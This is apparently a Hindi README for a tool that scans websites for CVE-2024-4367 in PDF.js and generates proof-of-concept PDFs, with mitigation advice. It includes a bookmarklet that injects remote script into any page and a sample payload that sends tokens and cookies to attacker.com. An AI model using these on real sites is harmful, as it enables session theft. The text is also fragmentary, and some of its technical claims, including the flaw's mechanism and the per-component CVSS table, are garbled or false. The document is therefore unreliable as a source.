
CVE-2024-4367 के लिए स्कैन एंड POC
⚠️ महत्वपूर्ण सुरक्षा उपकरण | CVE-2024-4367 (CVSS 9.8) का पता लगाता है - PDF.js रिमोट कोड निष्पादन भेद्यता
किसी भी वेबसाइट पर कार्य करता है - शून्य कॉन्फ़िगरेशन आवश्यक
CVE-2024-4367 PDF.js (संस्करण < 4.2.67) में एक गंभीर भेद्यता है जो दुर्भावनापूर्ण PDF फ़ाइलों के माध्यम से मनमाना JavaScript निष्पादन की अनुमति देती है। यह स्कैनर किसी भी वेबसाइट पर भेद्य PDF.js इंस्टेंस को स्वचालित रूप से पता लगाता है।
PDF.js में एक दोष है जहाँ PDF फ़ाइलों में एम्बेडेड JavaScript उचित सैंडबॉक्सिंग के बिना निष्पादित हो जाता है, जिससे हमलावर निम्न कार्य कर सकते हैं:
F12 दबाएँEnter दबाएँइस URL के साथ एक बुकमार्क बनाएँ:
javascript:(function(){const s=document.createElement('script');s.src='https://cdn.jsdelivr.net/gh/yourusername/CVE-2024-4367-Scanner/scanner.js';document.body.appendChild(s);})();
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
cd CVE-2024-4367-Scanner
# Open any website and run the script
<embed> तत्व<object> डेटा टैग?pdf=, ?file=, ?src=).pdf स्वीकार करने वाले फ़ाइल इनपुट फ़ील्ड┌─────────────────────────────────────────────────────────────┐
│ SCAN PROCESS FLOW │
├─────────────────────────────────────────────────────────────┤
│ │
│ 1. 📚 LOAD SCRIPTS │
│ ├─ External scripts (all <script src="">) │
│ └─ Inline scripts (all <script> tags) │
│ │
│ 2. 🔍 EXTRACT PDF.JS VERSION │
│ ├─ Pattern matching in code │
│ ├─ Package.json detection │
│ └─ Node_modules path parsing │
│ │
│ 3. 🎯 IDENTIFY VULNERABILITY │
│ ├─ version < 4.2.67 ? → VULNERABLE │
│ └─ version = 2.16.105 ? → VULNERABLE │
│ │
│ 4. 🖼️ LOCATE VIEWERS │
│ ├─ DOM element scanning │
│ └─ Attribute detection │
│ │
│ 5. ⚡ GENERATE POC │
│ ├─ Create test PDF │
│ └─ Provide download link │
│ │
│ 6. 📊 DISPLAY RESULTS │
│ ├─ Visual overlay │
│ ├─ Console report │
│ └─ Global variable storage │
│ │
└─────────────────────────────────────────────────────────────┘
╔═══════════════════════════════════════════════════════════════════════════════════╗
║ CVE-2024-4367 - UNIVERSAL PDF.js SCANNER ║
║ Detects vulnerable PDF.js versions and potential exploitation ║
╚═══════════════════════════════════════════════════════════════════════════════════╝
📚 PHASE 1: Scanning JavaScript Bundles for PDF.js
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] Found 42 external scripts
[+] Found 12 inline scripts
[1/42] Analyzing: vendor.bundle.js
→ PDF.js indicator found: pdfjs-dist
✅ PDF.js version found: 2.16.105
🚨 VULNERABLE to CVE-2024-4367!
🎯 PHASE 4: Identifying Exploitation Vectors
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
⚠️ URL parameter accepts PDF: file=/documents/report.pdf
⚠️ PDF upload form found
█████████████████████████████████████████████████████████████████████████████████
FINAL SCAN REPORT
█████████████████████████████████████████████████████████████████████████████████
🚨 CRITICAL VULNERABILITY CONFIRMED!
CVE: CVE-2024-4367
CVSS: 9.8 (CRITICAL)
Impact: Arbitrary JavaScript Execution
┌─────────────────────────────────────────────────────────────┐
│ CVE-2024-4367 SCAN RESULTS │
│ ━━━━━━━━━━━━━━━━━━━━━━━ │
│ 📍 Target: example.com │
│ 📦 PDF.js: 2.16.105 │
│ 🎯 Vulnerable: YES │
│ 📄 Viewers: 3 │
│ ⚡ Vectors: 2 │
│ ━━━━━━━━━━━━━━━━━━━━━━━ │
│ 🔴 CRITICAL - Upgrade Required │
└─────────────────────────────────────────────────────────────┘
# For Node.js projects
npm install pdfjs-dist@latest
# For CDN usage
# Update to version 4.2.67 or higher
// Set this before loading PDF.js
pdfjsLib.GlobalWorkerOptions.disableJavaScript = true;
Content-Security-Policy: script-src 'self';
object-src 'none';
worker-src 'none'
// Validate PDF files before rendering
function validatePDF(file) {
// Check magic bytes
const header = file.slice(0, 5);
if (header !== '%PDF-') {
throw new Error('Invalid PDF file');
}
// Scan for JavaScript
const text = file.toString();
if (text.includes('/JavaScript') ||
text.includes('/JS') ||
text.includes('<< /S /JavaScript >>')) {
throw new Error('PDF contains JavaScript');
}
}
URL पैरामीटर
/viewer?file=malicious.pdf
/download?pdf=malicious.pdf
फ़ाइल अपलोड
<input type="file" accept=".pdf">
एम्बेडेड व्यूअर
<embed src="malicious.pdf">
API एंडपॉइंट
/api/documents/123/download
/api/report/pdf
// PDF embedded JavaScript
this.alert('CVE-2024-4367 Exploited!');
fetch('https://attacker.com/steal', {
method: 'POST',
body: JSON.stringify({
token: localStorage.getItem('token'),
cookies: document.cookie
})
});
स्कैनर स्थापित करें
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
स्कैनर चलाएँ
# Open the target website
# Paste the scanner in console
# Or use the bookmarklet
परिणामों का विश्लेषण करें
POC PDF डाउनलोड करें (यदि असुरक्षित है)
फिक्स लागू करें
| परिदृश्य | परिणाम |
|---|---|
| PDF.js 2.16.105 | 🔴 गंभीर |
| PDF.js 3.x | 🔴 भेद्य |
| PDF.js 4.0.x | 🔴 भेद्य |
| PDF.js 4.2.67+ | ✅ सुरक्षित |
// Vulnerable versions
const VULNERABLE_VERSIONS = [
{ version: '2.16.105', status: 'CRITICAL' },
{ version: '3.x.x', status: 'CRITICAL' },
{ version: '4.0.x - 4.2.66', status: 'CRITICAL' }
];
// Safe version
const SAFE_VERSION = '4.2.67';
| तिथि | घटना |
|---|---|
| 2024-04-23 | भेद्यता की खोज हुई |
| 2024-04-24 | CVE-2024-4367 आवंटित किया गया |
| 2024-04-25 | पैच जारी किया गया (4.2.67) |
महत्वपूर्ण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।
- ✅ करें - इसका उपयोग अपनी स्वयं की वेबसाइटों पर करें
- ✅ करें - स्पष्ट अनुमति के साथ उपयोग करें
- ✅ करें - सुरक्षा अनुसंधान के लिए उपयोग करें
- ❌ न करें - अनधिकृत प्रणालियों पर उपयोग न करें
- ❌ न करें - दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग न करें
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
योगदान का स्वागत है! कृपया:
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
cd CVE-2024-4367-Scanner
# Make your changes
# Test on multiple websites
# Submit PR
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
यदि आपको यह उपकरण उपयोगी लगता है:
🛡️ सुरक्षित रहें। जल्दी परीक्षण करें। बार-बार परीक्षण करें।
सुरक्षा समुदाय द्वारा ❤️ के साथ निर्मित
समस्या रिपोर्ट करें • GitHub पर स्टार करें • दस्तावेज़ीकरण पढ़ें
| समाधान | कठिनाई | प्रभावशीलता |
|---|
| PDF.js अपग्रेड करें | आसान | ✅ पूर्ण फिक्स |
| PDF.js में JS अक्षम करें | आसान | ✅ पूर्ण फिक्स |
| CSP कार्यान्वयन | मध्यम | ✅ अच्छा |
| सर्वर-साइड सत्यापन | मध्यम | ✅ अच्छा |
| सैंडबॉक्स्ड रेंडरिंग | कठिन | ✅ उत्कृष्ट |
| PDF.js नहीं है | ℹ️ सुरक्षित |
| 2024-04-26 | सार्वजनिक खुलासा |
| 2024-05-01 | शोषण प्रयास देखे गए |
| घटक | स्कोर |
|---|
| आक्रमण वेक्टर | नेटवर्क (9.8) |
| आक्रमण जटिलता | निम्न (9.8) |
| आवश्यक विशेषाधिकार | कोई नहीं (9.8) |
| उपयोगकर्ता सहभागिता | आवश्यक (8.8) |
| दायरा | परिवर्तित (9.1) |
| गोपनीयता | उच्च (9.8) |
| अखंडता | उच्च (9.8) |
| उपलब्धता | उच्च (9.8) |
| कुल | 9.8 (गंभीर) |